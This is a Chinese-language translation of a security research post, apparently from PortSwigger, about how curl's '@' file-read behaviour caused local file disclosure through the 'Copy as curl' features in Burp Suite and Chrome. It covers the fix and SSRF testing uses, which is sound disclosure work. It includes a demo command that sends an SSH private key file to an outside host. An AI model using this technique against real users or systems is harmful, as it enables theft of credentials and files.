curl特性引发的Burp Suite与Google Chrome本地文件泄露漏洞剖析

本文深入分析了curl中鲜为人知的@文件读取特性,该特性导致Burp Suite Pro和Google Chrome存在本地文件泄露漏洞。探讨了漏洞原理、修复方案及在SSRF测试中的潜在利用价值。

curl特性引发的Burp Suite与Google Chrome本地文件泄露漏洞

James Kettle
研究总监
@albinowax

发布时间: 2023年3月28日 13:13 UTC
更新时间: 2023年3月28日 13:13 UTC


在本文中,我们将探讨curl中一个鲜为人知的特性,该特性导致Burp Suite Pro和Google Chrome均存在本地文件泄露漏洞。虽然我们早已为Burp Suite发布了补丁,但怀疑该技术可能有助于利用其他具有"复制为curl命令"功能或从命令行调用curl的应用程序。此漏洞由Paul Mutton通过我们的漏洞赏金计划私下报告,并慷慨同意我们发布此分析报告。

Burp Suite用户经常制作复杂的HTTP请求来演示网站中的漏洞。为了更轻松地与他人共享这些概念验证漏洞利用,我们提供了"复制为curl命令"功能,该功能生成可复制Burp Suite内请求的curl命令。

例如,给定以下请求:

1
2
3
4
5
6
POST / HTTP/1.1
Host: portswigger.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

如果点击"复制为curl命令",Burp Suite将生成以下命令并复制到剪贴板:

1
2
3
4
5
6
7
curl -i -s -k \
     -X $'POST' \
     -H $'Host: portswigger.net' \
     -H $'Content-Type: application/x-www-form-urlencoded' \
     -H $'Content-Length: 7' \
     --data-binary $'foo=bar' \
     $'https://portswigger.net/'

然后,您可以将此命令粘贴到终端中,在Burp Suite外部重新发出请求。我们非常小心地转义这些数据,以避免用户因恶意请求注入额外shell命令或任意curl参数而受到攻击。不幸的是,存在一个更微妙的问题。您能看出来吗?

一如既往,答案在于友好的手册:

1
2
3
--data-binary <data>
此选项按原样发布数据,不进行任何额外处理。
如果数据以字母@开头,其余部分应为文件名。

因此,这是安全的:

1
2
3
curl --data-binary '/home/albinowax/.ssh/id_rsa' --trace-ascii - https://02.rs/
=> 发送数据,28字节 (0x1c)
0000: /home/albinowax/.ssh/id_rsa

而这…就不那么安全了:

1
2
3
4
5
curl --data-binary '@/home/albinowax/.ssh/id_rsa' --trace-ascii - https://02.rs/
=> 发送数据,662字节 (0x296)
> -----BEGIN RSA PRIVATE KEY-----
.b3BlbnNzaC1rZXktdjEA....
(不是我的真实私钥)

我们在2020.5.1版本中通过切换到更新、更安全但支持较少的--data-raw标志(如果请求体以@符号开头)修复了此漏洞。

我们很幸运,因为在Burp Suite中利用此漏洞需要相对较多的用户交互——攻击者必须诱导用户访问恶意网站,将精心制作的请求复制为curl命令,然后通过命令行执行。如果网站使用curl且请求体受攻击者控制,这可能产生显著更高的影响,因此绝对值得在SSRF测试中密切关注。@文件读取行为也适用于标头,因此在允许定义自定义标头的网站上可能有用。

尽管此特性让我们(和Chrome)感到意外,但它已完全记录在案,因此我们不认为它是curl本身的漏洞。这让我想起服务器端模板注入,其中沙箱逃逸可能就像阅读一个被其他人忽视的手册页面一样简单。

再次感谢Paul分享这一酷炫技术。

下次见!

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计